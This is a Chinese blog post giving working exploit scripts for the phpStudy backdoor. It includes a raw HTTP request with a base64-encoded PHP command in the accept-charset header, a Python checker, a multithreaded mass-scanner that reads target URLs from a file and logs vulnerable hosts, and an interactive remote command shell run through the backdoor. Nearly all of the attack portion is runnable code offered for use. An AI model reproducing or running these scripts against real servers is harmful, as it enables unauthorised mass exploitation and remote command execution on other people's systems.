侯体宗的博客
  • 首页
  • Hyperf版
  • beego仿版
  • 人生(杂谈)
  • 技术
  • 关于我
  • 更多分类
    • 文件下载
    • 文字修仙
    • 中国象棋ai
    • 群聊
    • 九宫格抽奖
    • 拼图
    • 消消乐
    • 相册

phpstudy后门rce批量利用脚本的实现

php  /  管理员 发布于 7年前   248

写两个一个批量检测的 一个交互式shell的

暂时py 图形化的qt写出来..有点问题

后门包 :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

执行那段写shell即可

晚上抽点空简单写个发包的py:

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport queueprint("======Phpstudy Backdoor Exploit============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")payload = "echo \"qing\";"payload = base64.b64encode(payload.encode('utf-8'))payload = str(payload, 'utf-8')headers = {  'Upgrade-Insecure-Requests': '1',  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'Accept-Language': 'zh-CN,zh;q=0.9',  'accept-charset': payload,  'Accept-Encoding': 'gzip,deflate',  'Connection': 'close',}def write_shell(url,headers):  try:    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)    if "qing" in r.text:      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')      with open('success.txt','a') as f:          f.write(url+'\n')    else:      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')  except:    print ('[ - ] Timeout: '+url+' [ - ]\n')url = "http://xxx"write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport threadpoolprint("======Phpstudy Backdoor Exploit============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")def write_shell(url):  payload = "echo \"qing\";"  payload = base64.b64encode(payload.encode('utf-8'))  payload = str(payload, 'utf-8')  headers = {  'Upgrade-Insecure-Requests': '1',  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'Accept-Language': 'zh-CN,zh;q=0.9',  'accept-charset': payload,  'Accept-Encoding': 'gzip,deflate',  'Connection': 'close',}  try:    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)    if "qing" in r.text:      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')      with open('success.txt','a') as f:          f.write(url+'\n')    else:      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')  except:    print ('[ - ] Timeout: '+url+' [ - ]\n')# url = "http://xxx"# write_shell(url=url,headers=headers)def main():  with open('url.txt','r') as f:    lines = f.read().splitlines()    task_pool=threadpool.ThreadPool(5)    requests=threadpool.makeRequests(write_shell,lines)  for req in requests:    task_pool.putRequest(req)    task_pool.wait() if __name__ == '__main__':  main()#线程队列部分# th=[]# th_num=10# for x in range(th_num):#     t=threading.Thread(target=write_shell)#     th.append(t)# for x in range(th_num):#     th[x].start()# for x in range(th_num):#     th[x].join()

你也可以加上读取php文件的字典 这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3#-*- encoding:utf-8 -*-# 卿 博客:https://www.cnblogs.com/-qing-/import base64import requestsimport threadingimport threadpoolimport reprint("======Phpstudy Backdoor Exploit---os-shell============\n")print("===========By Qing=================\n")print("=====Blog:https://www.cnblogs.com/-qing-/==\n")def os_shell(url,headers,payload):  try:    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)    # print(r.text)    res = re.findall("qing(.*?)qing",r.text,re.S)    print("[ + ]===========The Response:==========[ + ]\n")    res = "".join(res)    print(res)  except:    print("[ - ]===========Failed! Timeout...==========[ - ]\n")def main():  url = input("input the Url , example:\"http://127.0.0.1/\"\n")  payload = input("input the payload , default:echo system(\"whoami\");\n")  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"  if payload.strip() == '':    payload = de_payload  payload = "echo \"qing\";"+payload+"echo \"qing\";"  payload = base64.b64encode(payload.encode('utf-8'))  payload = str(payload, 'utf-8')  headers = {  'Upgrade-Insecure-Requests': '1',  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',  'Accept-Language': 'zh-CN,zh;q=0.9',  'accept-charset': payload,  'Accept-Encoding': 'gzip,deflate',  'Connection': 'close',  }  os_shell(url=url,headers=headers,payload=payload)if __name__ == '__main__':  main()

 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。

您可能感兴趣的文章:

  • phpStudy2018安装教程及本地服务器的配置方法
  • phpStudy访问速度慢和启动失败的解决办法
  • phpStudy配置多站点多域名和多端口的方法
  • phpstudy2018 访问目录服务权限问题
  • phpstudy的php版本自由修改的方法
  • phpStudy配置多站点多域名方法及遇到的403错误解决方法
  • phpstudy默认不支持64位php的解决方法
  • 关于Windows 不能在 本地计算器 启动 Apache2(phpstudy)
  • phpStudy2016 配置多个域名期间遇到的问题小结
  • phpStudy 2011 简体中文版(A B版)
  • PHPStudy下如何为Apache安装SSL证书的方法步骤


  • 上一条:
    Vagrant(WSL)+PHPStorm+Xdebu 断点调试环境搭建
    下一条:
    PHP设计模式之数据访问对象模式(DAO)原理与用法实例分析
  • 昵称:

    邮箱:

    0条评论 (评论内容有缓存机制,请悉知!)
    最新最热
    • 分类目录
    • 人生(杂谈)
    • 技术
    • linux
    • Java
    • php
    • 框架(架构)
    • 前端
    • ThinkPHP
    • 数据库
    • 微信(小程序)
    • Laravel
    • Redis
    • Docker
    • Go
    • swoole
    • Windows
    • Python
    • 苹果(mac/ios)
    • 相关文章
    • Laravel从Accel获得5700万美元A轮融资(0个评论)
    • PHP 8.4 Alpha 1现已发布!(0个评论)
    • 用Time Warden监控PHP中的代码处理时间(0个评论)
    • 在PHP中使用array_pop + yield实现读取超大型目录功能示例(0个评论)
    • Property Hooks RFC在PHP 8.4中越来越接近现实(0个评论)
    • 近期文章
    • 智能合约Solidity学习CryptoZombie第四课:僵尸作战系统(0个评论)
    • 智能合约Solidity学习CryptoZombie第三课:组建僵尸军队(高级Solidity理论)(0个评论)
    • 智能合约Solidity学习CryptoZombie第二课:让你的僵尸猎食(0个评论)
    • 智能合约Solidity学习CryptoZombie第一课:生成一只你的僵尸(0个评论)
    • 在go中实现一个常用的先进先出的缓存淘汰算法示例代码(0个评论)
    • 在go+gin中使用"github.com/skip2/go-qrcode"实现url转二维码功能(0个评论)
    • 在go语言中使用api.geonames.org接口实现根据国际邮政编码获取地址信息功能(1个评论)
    • 在go语言中使用github.com/signintech/gopdf实现生成pdf分页文件功能(0个评论)
    • gmail发邮件报错:534 5.7.9 Application-specific password required...解决方案(0个评论)
    • 欧盟关于强迫劳动的规定的官方举报渠道及官方举报网站(0个评论)
    • 近期评论
    • 122 在

      学历:一种延缓就业设计,生活需求下的权衡之选中评论 工作几年后,报名考研了,到现在还没认真学习备考,迷茫中。作为一名北漂互联网打工人..
    • 123 在

      Clash for Windows作者删库跑路了,github已404中评论 按理说只要你在国内,所有的流量进出都在监控范围内,不管你怎么隐藏也没用,想搞你分..
    • 原梓番博客 在

      在Laravel框架中使用模型Model分表最简单的方法中评论 好久好久都没看友情链接申请了,今天刚看,已经添加。..
    • 博主 在

      佛跳墙vpn软件不会用?上不了网?佛跳墙vpn常见问题以及解决办法中评论 @1111老铁这个不行了,可以看看近期评论的其他文章..
    • 1111 在

      佛跳墙vpn软件不会用?上不了网?佛跳墙vpn常见问题以及解决办法中评论 网站不能打开,博主百忙中能否发个APP下载链接,佛跳墙或极光..
    • 2016-10
    • 2016-11
    • 2017-06
    • 2017-07
    • 2017-08
    • 2017-09
    • 2017-11
    • 2017-12
    • 2018-01
    • 2018-02
    • 2018-03
    • 2020-03
    • 2020-04
    • 2020-05
    • 2020-06
    • 2020-07
    • 2020-09
    • 2021-02
    • 2021-03
    • 2021-04
    • 2021-05
    • 2021-06
    • 2021-07
    • 2021-08
    • 2021-09
    • 2021-10
    • 2021-11
    • 2021-12
    • 2022-01
    • 2022-02
    • 2022-05
    • 2022-06
    • 2022-07
    • 2022-08
    • 2022-09
    • 2022-10
    • 2022-11
    • 2022-12
    • 2023-01
    • 2023-02
    • 2023-03
    • 2023-04
    • 2023-05
    • 2023-06
    • 2023-07
    • 2023-08
    • 2023-09
    • 2023-10
    • 2023-11
    • 2023-12
    • 2024-01
    • 2024-02
    • 2024-03
    • 2024-04
    • 2024-05
    • 2024-06
    • 2024-07
    • 2024-09
    Top

    Copyright·© 2019 侯体宗版权所有· 粤ICP备20027696号 PHP交流群

    侯体宗的博客